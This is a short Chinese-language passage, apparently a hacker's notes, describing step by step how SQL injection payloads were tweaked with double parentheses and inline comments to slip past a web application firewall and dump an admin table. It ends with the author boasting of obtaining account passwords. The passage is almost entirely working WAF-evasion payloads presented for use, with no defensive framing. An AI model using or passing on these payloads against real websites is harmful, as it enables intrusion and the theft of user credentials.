union (select)
还是被拦截===一个括号解决不了的问题,那就两个吧:union ((select))
OK,狗没有拦截俩括号的,至于为什么没有信息,因为我这里没有对sql语句进行判断是否有语法错误...试了半天====还好是过了===
爆数据了:/**/union/**/((select/**/username,2,3/**/from/**/admin/**/))
别闹===到这里我实在是绕不动了,在1,2,3...这里只要出现字母就被拦截,
但是,我貌似看到了一个更直接的:
/**/union/**/((select/**/*/**/from/**/admin/**/)),直接他么的给他改成一个通配符,哈哈
拿到账号密码了